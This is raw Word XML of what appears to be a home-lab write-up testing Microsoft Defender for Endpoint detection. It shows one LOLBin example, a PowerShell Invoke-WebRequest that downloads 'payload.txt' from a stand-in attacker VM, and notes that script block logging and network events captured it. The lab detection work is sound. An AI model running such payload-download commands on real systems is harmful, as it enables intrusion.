    <w:p w14:paraId="2AD97896" w14:textId="77777777" w:rsidR="00C81BE4" w:rsidRDefault="00C81BE4" w:rsidP="00C81BE4">
      <w:r>
        <w:t>Get-Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720EA13C" w14:textId="73F3DD58" w:rsidR="00C81BE4" w:rsidRDefault="00C81BE4" w:rsidP="00C81BE4">
      <w:r>
        <w:t>Get-Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B5C00A" w14:textId="77777777" w:rsidR="009A2BCC" w:rsidRDefault="009A2BCC" w:rsidP="00C81BE4"/>
    <w:p w14:paraId="758F7033" w14:textId="42BA765E" w:rsidR="009A2BCC" w:rsidRDefault="009A2BCC" w:rsidP="00C81BE4">
      <w:r w:rsidRPr="009A2BCC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="065BD350" wp14:editId="0BC64B67">
            <wp:extent cx="4359018" cy="3132091"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="41097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39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27F0" w14:textId="4786DD71" w:rsidR="009A2BCC" w:rsidRDefault="009A2BCC" w:rsidP="00C81BE4">
      <w:r w:rsidRPr="009A2BCC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BEA22E7" wp14:editId="0049AC26">
            <wp:extent cx="4968671" cy="4008467"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1488989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89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D316" w14:textId="3346A190" w:rsidR="009A2BCC" w:rsidRDefault="009A2BCC" w:rsidP="00C81BE4">
      <w:r w:rsidRPr="009A2BCC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37B0CE4E" wp14:editId="328DAD22">
            <wp:extent cx="5943600" cy="2179955"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="205336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00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94CD" w14:textId="297687AD" w:rsidR="00E454F1" w:rsidRDefault="00E454F1" w:rsidP="00C81BE4">
      <w:r>
        <w:t>What I just proved is that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA333E" w14:textId="4119A328" w:rsidR="00E454F1" w:rsidRDefault="00E454F1" w:rsidP="00E454F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command line auditing is enabled. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62453AA9" w14:textId="3B920861" w:rsidR="00E454F1" w:rsidRDefault="00E454F1" w:rsidP="00E454F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Telemetry is flowing to MDE. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2FCF0F" w14:textId="34386B12" w:rsidR="00E454F1" w:rsidRDefault="00E454F1" w:rsidP="00E454F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I can detect real threats. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F45114" w14:textId="6069F3D7" w:rsidR="009A2BCC" w:rsidRDefault="00E454F1" w:rsidP="00C81BE4">
      <w:r w:rsidRPr="00E454F1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BBC6515" wp14:editId="533E5BE3">
            <wp:extent cx="5943600" cy="1816100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9876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39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22A1" w14:textId="19CCE7A6" w:rsidR="00C81BE4" w:rsidRDefault="00C81BE4" w:rsidP="00C81BE4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C81BE4">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔹 LOLBin</w:t>
      </w:r>
      <w:r w:rsidR="0044396A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Living off the land binary)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C81BE4">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7037D38E" w14:textId="7C572B0B" w:rsidR="0044396A" w:rsidRPr="0044396A" w:rsidRDefault="0044396A" w:rsidP="0044396A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044396A">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>LOLBins are legitimate windows binaries often abused by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DEEA86" w14:textId="08E8517B" w:rsidR="005B0468" w:rsidRDefault="00C81BE4">
      <w:r w:rsidRPr="00C81BE4">
        <w:t xml:space="preserve">Invoke-WebRequest -Uri </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="004F65EA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://your-ubuntu-vm-ip/payload.txt -OutFile payload.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10C87F13" w14:textId="13074E9D" w:rsidR="00172947" w:rsidRDefault="003A7219" w:rsidP="003A7219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Powershell initiates a webrequest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EADC978" w14:textId="2B9A1F22" w:rsidR="003A7219" w:rsidRDefault="003A7219" w:rsidP="003A7219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Powershell downloads the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D25F01B" w14:textId="4363D9A0" w:rsidR="003A7219" w:rsidRDefault="003A7219" w:rsidP="003A7219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The file is saved locally </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36586424" w14:textId="2E263999" w:rsidR="00172947" w:rsidRDefault="00172947">
      <w:r w:rsidRPr="00172947">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B7C5F47" wp14:editId="64FECA88">
            <wp:extent cx="5943600" cy="502920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="115091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02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31F0" w14:textId="6E1B19FC" w:rsidR="002D23F3" w:rsidRDefault="00880183">
      <w:r w:rsidRPr="00880183">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20C0C5CB" wp14:editId="1E70D04B">
            <wp:extent cx="5806943" cy="1013548"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="100129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928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C996" w14:textId="230F6FEB" w:rsidR="003A7219" w:rsidRDefault="003A7219">
      <w:r>
        <w:t>Script block logged event id 4104 captured the command as script block logging is enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279310F3" w14:textId="399266AA" w:rsidR="002D23F3" w:rsidRDefault="00880183">
      <w:r w:rsidRPr="00880183">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40795E00" wp14:editId="4D392037">
            <wp:extent cx="5943600" cy="2849880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="115527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2782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778E" w14:textId="66A70AAE" w:rsidR="00880183" w:rsidRDefault="00880183">
      <w:r>
        <w:t>The payload file from ubuntu got successfully downloaded to windows vm as seen in the path below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23735A2B" w14:textId="77777777" w:rsidR="00880183" w:rsidRDefault="00880183"/>
    <w:p w14:paraId="719CFCAD" w14:textId="1F587A40" w:rsidR="00880183" w:rsidRDefault="00880183">
      <w:r w:rsidRPr="00880183">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2056BA40" wp14:editId="16785E15">
            <wp:extent cx="5943600" cy="911860"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="96669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912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8D92" w14:textId="7D79385A" w:rsidR="00495D21" w:rsidRDefault="003A7219">
      <w:r>
        <w:t xml:space="preserve">As seen in the screen shots below Microsoft Defender for Endpoint </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B487E10" w14:textId="46EF71EF" w:rsidR="003A7219" w:rsidRDefault="003A7219">
      <w:r>
        <w:t xml:space="preserve">Device Network Events logged the outbound connections </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E45E8A4" w14:textId="1BC1318E" w:rsidR="000E7E4D" w:rsidRDefault="00880183">
      <w:r w:rsidRPr="00880183">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D96D03A" wp14:editId="77D63C66">
            <wp:extent cx="5943600" cy="2280920"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="6093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4E73" w14:textId="77777777" w:rsidR="00880183" w:rsidRDefault="00880183"/>
    <w:p w14:paraId="39C48CA1" w14:textId="2D7CA0E6" w:rsidR="00880183" w:rsidRDefault="00880183">
      <w:r w:rsidRPr="00880183">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21355107" wp14:editId="663133ED">
            <wp:extent cx="5943600" cy="2204085"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="40984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1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6E23" w14:textId="7B1D80CF" w:rsidR="00B6423E" w:rsidRPr="00B6423E" w:rsidRDefault="00880183" w:rsidP="00880183">
      <w:r w:rsidRPr="00880183">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01B4E1A0" wp14:editId="13405FBD">
            <wp:extent cx="5890770" cy="2537680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="106403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369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2180" w14:textId="77777777" w:rsidR="00B6423E" w:rsidRPr="00C81BE4" w:rsidRDefault="00B6423E" w:rsidP="00C81BE4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B6423E" w:rsidRPr="00C81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B1C30"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CFC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E4D8A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DFB2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C5D4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26E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840674"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="620A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E048B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5806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D049A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="782C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E55418"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A52A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2228B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01E8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52AF1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="22B4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FF0BA1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF7A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CE0920"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="910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7364408">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1026757729">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="516770300">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1659844183">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="499274109">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="301734711">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1520437238">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1174104883">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1732773749">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="116720242">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="17606330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12"/>
    <w:rsid w:val="0005362D"/>
    <w:rsid w:val="000A2E41"/>
    <w:rsid w:val="000E7E4D"/>
    <w:rsid w:val="001231B9"/>
    <w:rsid w:val="00172947"/>
    <w:rsid w:val="0017663F"/>
    <w:rsid w:val="002D23F3"/>
    <w:rsid w:val="002D699D"/>
    <w:rsid w:val="003A7219"/>
    <w:rsid w:val="0044396A"/>
    <w:rsid w:val="00495D21"/>
    <w:rsid w:val="004C6E85"/>
    <w:rsid w:val="00527D78"/>
    <w:rsid w:val="005B0468"/>
    <w:rsid w:val="007C0C23"/>
    <w:rsid w:val="00880183"/>
    <w:rsid w:val="00977FDE"/>
    <w:rsid w:val="009A2BCC"/>
    <w:rsid w:val="00A35004"/>
    <w:rsid w:val="00B6423E"/>
    <w:rsid w:val="00BE75EE"/>
    <w:rsid w:val="00C81BE4"/>
    <w:rsid w:val="00D62597"/>
    <w:rsid w:val="00E454F1"/>
    <w:rsid w:val="00F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81629"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C6214EA6-6E99-47AF-A0EA-F6D57C2C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0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0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D0B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B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B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B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B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B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B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B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B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B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B1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81BE4"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C81B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B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C0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://your-ubuntu-vm-ip/payload.txt%20-OutFile%20payload.txt" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.microsoft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5440</TotalTime>
  <Pages>12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kanukolanu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>bharadwaj kanukolanu</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-22T19:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-07T04:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>